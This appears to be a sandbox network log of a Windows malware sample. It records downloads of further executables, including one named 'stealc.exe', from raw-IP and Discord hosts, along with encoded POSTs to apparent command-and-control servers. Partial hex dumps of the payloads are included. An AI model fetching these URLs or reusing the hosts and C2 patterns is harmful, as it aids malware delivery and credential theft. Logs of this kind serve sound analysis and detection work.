Aug 10, 2024 16:12:22.804059982 CEST	216	OUT	GET /prog/66b45c742e0a1_123p.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:23.003976107 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: application/octet-stream Content-Length: 10590720 Last-Modified: Thu, 08 Aug 2024 05:49:40 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b45c74-a19a00" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 18 5c b4 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 04 cd 00 00 00 00 00 4f 60 56 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 92 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3d 57 01 3c 00 00 00 00 40 8f 01 d0 04 03 00 40 13 8f 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 5d 01 28 00 00 00 00 12 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd\f#O`V@P =W<@@`*](8 .textv~ `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0S% `.text1X@.text2`h.rsrc@@@
Aug 10, 2024 16:12:30.369493008 CEST	224	OUT	GET /prog/66b5b75106ac6_stealc.exe#space HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 147.45.44.104 Cache-Control: no-cache
Aug 10, 2024 16:12:30.561181068 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 10 Aug 2024 14:12:30 GMT Content-Type: application/octet-stream Content-Length: 6332416 Last-Modified: Fri, 09 Aug 2024 06:29:37 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66b5b751-60a000" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3e a7 b5 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 bc 5e 00 00 e0 01 00 00 00 00 00 6e da 5e 00 00 20 00 00 00 e0 5e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 61 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 da 5e 00 4b 00 00 00 00 00 5f 00 bc d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 60 00 0c 00 00 00 d4 d9 5e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL>f^n^ ^@ a@ ^K_`^ H.textt^ ^ `.sdata^^@.rsrc_^@@.reloc``@B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.215.113.16	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.968672991 CEST	208	OUT	HEAD /inc/armadegon.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 185.215.113.16 Cache-Control: no-cache
Aug 10, 2024 16:12:21.711314917 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 964096 Last-Modified: Thu, 08 Aug 2024 20:21:31 GMT Connection: keep-alive ETag: "66b528cb-eb600" Accept-Ranges: bytes
Aug 10, 2024 16:12:21.711849928 CEST	207	OUT	GET /inc/armadegon.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 185.215.113.16 Cache-Control: no-cache
Aug 10, 2024 16:12:21.954565048 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: application/octet-stream Content-Length: 964096 Last-Modified: Thu, 08 Aug 2024 20:21:31 GMT Connection: keep-alive ETag: "66b528cb-eb600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 6e 7e 57 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ae 0e 00 00 06 00 00 00 00 00 00 9e cc 0e 00 00 20 00 00 00 e0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 cc 0e 00 4b 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELn~W @ `PK H.text `.rsrc@@.reloc@BHtFJ_Eh=14%bfiIhHl(obAci[K%$cQ#\|i`%]RWO1]ZcTIJ&Mgx6\H7/A9x7@~Xy^E94[om$x
Aug 10, 2024 16:12:21.955307961 CEST	1236	IN	Data Raw: 58 00 00 b7 d1 00 00 78 56 00 00 3b 02 00 00 e7 ce 00 00 13 f8 00 00 c9 00 00 00 4f c9 00 00 92 53 00 00 43 0d 00 00 ab 03 00 00 3b 90 00 00 c6 e3 00 00 99 0b 00 00 50 77 00 00 8c 9c 00 00 a9 21 00 00 6a e4 00 00 98 d6 00 00 d3 08 00 00 ba 11 00 Data Ascii: XxV;OSC;Pw!j>J\|I#RIok;A7,iZJ(lvQfN) 7
Aug 10, 2024 16:12:21.955323935 CEST	328	IN	Data Raw: ef e4 ef f1 ef 7d ce c6 eb fc d7 82 e8 94 cc d5 d9 6a f4 e5 c5 7e be 79 be 60 be ea a5 22 94 e0 9f 1a ba 76 86 4d b9 08 9d dc 7d c1 7d c3 7d 4c 66 d5 57 58 5c fd 79 db 45 b3 7a b0 5e a6 4b 51 66 d4 57 5d 5c fc 79 c8 45 ff 7a a2 5e ef 4b 15 66 cc Data Ascii: }j~y`"vM}}}LfWX\yEz^KQfW]\yEz^KfW\yEz^KXfWZ\yEnnnMX1uD!OjViMX#uD2OjViMX.uD#OjViMX/uD/OjVnnnMXJuDrO%TTUs\3g4Gd ]h4d!C[4eG-
Aug 10, 2024 16:12:21.957387924 CEST	1236	IN	Data Raw: ac e3 42 b7 92 85 6d d0 f9 62 26 01 6d 0f 1e d9 4f 0a 22 07 57 7f 16 74 56 c2 f9 42 3c ce df ba 80 55 f6 2a 7b 27 e7 8c 70 3f d9 50 fd f5 4c 14 11 bb 22 7d 16 5c 01 2d cd cd 61 ce 8b 2b 94 2b 81 6b 7f 17 18 f2 5e 28 21 95 96 18 a4 c5 75 5f 76 e4 Data Ascii: Bmb&mO"WtVB<U*{'p?PL"}\-a++k^(!u_v0b#S\Ev4][XX~[ObQmA!#]j@STZK0pRt{tXC\I9G<t6Bcc%COn\IE[}bmi^}4a
Aug 10, 2024 16:12:21.957401991 CEST	1236	IN	Data Raw: 00 06 7d 60 00 00 04 02 28 33 00 00 0a 02 73 a9 00 00 0a 7d 5e 00 00 04 02 03 28 cd 00 00 06 2a d0 b1 00 00 06 26 2a 52 02 7b 5e 00 00 04 03 6f aa 00 00 0a 2a d0 be 00 00 06 26 2a 52 17 17 73 b7 00 00 0a 80 63 00 00 04 2a d0 d4 00 00 06 26 2a 3a Data Ascii: }`(3s}^(&R{^o&Rsc&:(3&R((&>}o&08+$E&+~o u*08+$E
Aug 10, 2024 16:12:21.960794926 CEST	448	IN	Data Raw: 00 00 00 0a 00 00 00 11 00 00 00 00 00 00 00 d0 0e 00 00 06 26 17 0c 2b dc 02 28 36 00 00 0a 0a 06 7e 6e 00 00 04 20 ac 01 00 00 7e 6e 00 00 04 20 ac 01 00 00 91 7e 17 00 00 04 20 9a 00 00 00 94 59 1f 68 5f 9c 2a 13 30 01 00 38 00 00 00 07 00 00 Data Ascii: &+(6~n ~n ~ Yh_08+$E&+(&u0V+$E&+(7u>~N~N~ X _*0
Aug 10, 2024 16:12:21.960808992 CEST	1236	IN	Data Raw: 00 00 06 26 2a 00 00 13 30 02 00 35 00 00 00 05 00 00 11 2b 24 08 45 05 00 00 00 17 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 17 00 00 00 d0 13 00 00 06 26 18 0c 2b dc 02 03 28 34 00 00 0a 28 35 00 00 0a 0a 06 2a 00 00 00 13 30 01 00 2f 00 00 Data Ascii: &05+$E&+(4(50/+$E&+(608+$E&+(&u04+$E
Aug 10, 2024 16:12:21.964416981 CEST	1236	IN	Data Raw: 00 00 0a 7a 02 7b 12 00 00 04 7c 76 00 00 04 25 0c 08 4a 17 da 54 17 13 04 2b 82 02 0a 06 74 0e 00 00 02 2a 00 00 00 13 30 02 00 49 00 00 00 03 00 00 11 2b 28 08 45 06 00 00 00 10 00 00 00 00 00 00 00 10 00 00 00 22 00 00 00 0a 00 00 00 0a 00 00 Data Ascii: z{\|v%JT+t0I+(E"'&+(2{oA+t0g+,E6$$:(&+~B(C,++(2{oD+u*
Aug 10, 2024 16:12:21.964437008 CEST	208	IN	Data Raw: 00 00 11 1c 13 05 11 05 45 0b 00 00 00 54 00 00 00 85 00 00 00 69 00 00 00 9a 00 00 00 85 00 00 00 17 00 00 00 00 00 00 00 b6 00 00 00 17 00 00 00 38 00 00 00 4c 00 00 00 02 7b 12 00 00 04 7b 77 00 00 04 0a 06 2c 05 1e 13 05 2b b9 16 2b f9 02 7b Data Ascii: ETi8L{{w,++{oA}}+{}w(38y{,8g+{,oA}8H{,86
Aug 10, 2024 16:12:21.964446068 CEST	1236	IN	Data Raw: 1d 2b f6 02 7b 0f 00 00 04 1f 20 6f 41 00 00 0a 02 16 7d 10 00 00 04 1d 13 05 38 17 ff ff ff 2a d0 32 00 00 06 26 2a 13 30 02 00 7e 00 00 00 16 00 00 11 7e 17 00 00 04 13 04 17 0d 09 45 08 00 00 00 47 00 00 00 00 00 00 00 1a 00 00 00 1a 00 00 00 Data Ascii: +{ oA}82&0~~EG<G{{v++{ oA Y+1++3&0%+&E5&+s3(4
Aug 10, 2024 16:12:21.967982054 CEST	1236	IN	Data Raw: 2b d2 7e 19 00 00 04 2d 05 17 13 08 2b c6 11 09 20 c0 01 00 00 91 20 f0 00 00 00 59 2b ec 7f 19 00 00 04 73 5a 00 00 0a 14 28 05 00 00 2b 26 19 13 08 2b a0 16 0c 16 13 0b 11 0b 45 08 00 00 00 00 00 00 00 0c 00 00 00 55 00 00 00 4f 00 00 00 20 00 Data Ascii: +~-+ Y+sZ(+&+EUO O :~(\~{]-++~}]s^+~{]3++s_zHE%% ~}],++~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	194.58.114.223	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.968980074 CEST	199	OUT	HEAD /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 194.58.114.223 Cache-Control: no-cache
Aug 10, 2024 16:12:21.654639006 CEST	356	IN	HTTP/1.1 302 Found Server: nginx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&
Aug 10, 2024 16:12:22.346247911 CEST	198	OUT	GET /d/525403 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: 194.58.114.223 Cache-Control: no-cache
Aug 10, 2024 16:12:22.568547964 CEST	1236	IN	HTTP/1.1 302 Found Server: nginx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=120 Location: https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde& Data Raw: 34 35 36 0d 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 52 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 31 34 35 38 37 39 32 33 38 32 38 39 38 35 39 30 39 2f 31 32 37 31 38 32 38 31 31 36 31 30 30 32 32 32 39 38 37 2f 73 65 74 75 70 2e 65 78 65 3f 65 78 3d 36 36 62 38 63 31 62 63 26 69 73 3d 36 36 62 37 37 30 33 63 26 68 6d 3d 33 66 66 65 35 62 62 32 33 64 30 35 34 38 31 39 61 65 32 33 31 33 65 37 31 38 61 30 65 63 36 34 65 32 61 64 65 33 31 61 39 39 36 35 65 38 62 30 34 31 66 37 65 32 33 31 62 65 33 66 63 62 64 65 26 27 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 [TRUNCATED] Data Ascii: 456<html> <head> <meta name="referrer" content="no-referrer"> <meta http-equiv="Refresh" content="0; URL='https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&'"> <script> window.location.href="https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&"; </script> </head> <body> <a href="https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&" referrerPolicy="no-referrer" rel="noreferrer">click here</a>
Aug 10, 2024 16:12:22.568563938 CEST	270	IN	Data Raw: 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 Data Ascii: <script> self.location="https://cdn.discordapp.com/attachments/1114587923828985909/1271828116100222987/setup.exe?ex=66b8c1bc&is=66b7703c&hm=3ffe5bb23d054819ae2313e718a0ec64e2ade31a9965e8b041f7e231be3fcbde&"; </script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	87.240.132.78	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.979729891 CEST	164	OUT	Data Raw: 16 03 03 00 9f 01 00 00 9b 03 03 66 b7 75 43 cb b7 b2 b9 42 8b 56 f5 d3 df 4a 8e bc ad 26 97 86 4f 01 35 20 e2 51 44 ff 08 30 8f 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: fuCBVJ&O5 QD0&,+0/$#('=<5/Lvk.com#
Aug 10, 2024 16:12:21.648634911 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Sat, 10 Aug 2024 14:12:21 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	162.0.209.124	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:20.989203930 CEST	169	OUT	Data Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 b7 75 43 a1 b6 7e 93 6c 7d 8b e2 fd 88 5f f0 81 7e 2c 8b 8c 1e 8b 79 ab 97 d9 61 56 e6 aa 94 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f Data Ascii: fuC~l}_~,yaV&,+0/$#('=<5/Qhelleaa.com#
Aug 10, 2024 16:12:21.600341082 CEST	207	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	162.0.209.124	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:21.612060070 CEST	115	OUT	Data Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 b7 75 44 fe c3 2d 99 13 ff 78 34 de f8 4c 63 a5 86 e7 69 fc 85 f7 3d d9 a3 3f 18 96 61 a3 71 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 68 65 6c 6c 65 61 61 2e 63 Data Ascii: njfuD-x4Lci=?aq5/3helleaa.com#
Aug 10, 2024 16:12:22.218874931 CEST	207	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	87.240.132.78	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:21.660814047 CEST	110	OUT	Data Raw: 16 03 01 00 69 01 00 00 65 03 01 66 b7 75 44 39 a5 67 2b 12 15 ce ff 01 4c 02 47 e0 d9 ac 93 aa e9 24 14 82 bb b8 54 51 2a f3 0f 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 2e 00 00 00 0b 00 09 00 00 06 76 6b 2e 63 6f 6d 00 0a 00 Data Ascii: iefuD9g+LG$TQ*5/.vk.com#
Aug 10, 2024 16:12:22.335268974 CEST	341	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Sat, 10 Aug 2024 14:12:22 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49755	185.225.200.214	80	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:39.089301109 CEST	276	OUT	POST /api/twofish.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Length: 517 Host: 185.225.200.214
Aug 10, 2024 16:12:39.089339018 CEST	517	OUT	Data Raw: 64 61 74 61 3d 31 77 75 4a 68 68 78 79 42 46 48 71 45 6d 52 39 78 67 36 72 57 57 78 6c 61 2d 6b 5f 56 43 36 49 64 65 65 56 45 57 6f 68 69 4b 4d 42 75 72 35 2d 69 6b 45 57 50 54 42 62 72 73 45 54 65 6e 4f 61 72 72 56 44 32 34 6f 35 31 52 44 6e 64 Data Ascii: data=1wuJhhxyBFHqEmR9xg6rWWxla-k_VC6IdeeVEWohiKMBur5-ikEWPTBbrsETenOarrVD24o51RDnd12P1Bppg9lDByaKg_LNiMwHmpthRQiAHTIBr3leQyg9UgHBEW0h9DGIsdyxosu-N6cvzMLKWyCoifODL9RQnkAGADduF5udt-Em7dl7LjE2pEvCY4dGFdvBbTwWi5SFGivqOyvZyPMoMz4FCyZnzS_6T1a7w8u-62
Aug 10, 2024 16:12:41.866446972 CEST	363	IN	HTTP/1.1 200 OK Date: Sat, 10 Aug 2024 14:12:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 47 66 4a 49 2f 66 53 4c 71 43 55 36 38 70 68 2b 73 37 6b 7a 79 70 6a 41 35 76 6d 4c 4a 45 67 65 65 7a 32 34 30 75 48 6a 6f 69 50 6e 73 36 5a 64 6d 2f 58 43 65 44 37 55 63 54 52 2f 32 42 73 5a 71 58 53 4c 6a 6f 66 5a 45 62 67 6e 42 66 2f 58 4e 6b 57 52 66 48 4e 69 68 58 4c 50 70 6c 42 4c 6d 49 48 4c 38 32 30 30 4b 45 38 3d Data Ascii: GfJI/fSLqCU68ph+s7kzypjA5vmLJEgeez240uHjoiPns6Zdm/XCeD7UcTR/2BsZqXSLjofZEbgnBf/XNkWRfHNihXLPplBLmIHL8200KE8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49757	147.45.47.59	80	1456	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:12:43.266072035 CEST	87	OUT	GET / HTTP/1.1 Host: 147.45.47.59 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49800	38.180.132.96	80	5180	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Aug 10, 2024 16:13:17.244328976 CEST	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Host: arpdabl.zapto.org Content-Length: 5537 Connection: Keep-Alive Cache-Control: no-cache
Aug 10, 2024 16:13:17.244380951 CEST	5537	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 39 61 35 64 36 Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"d9a5d64d08e49b2fe49e29c9c33feb66------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="build_id"de2cea1f145998409041f17e238ab295------GHJEGCAEGIIIDH
Aug 10, 2024 16:13:18.093065023 CEST	161	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 10 Aug 2024 14:13:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

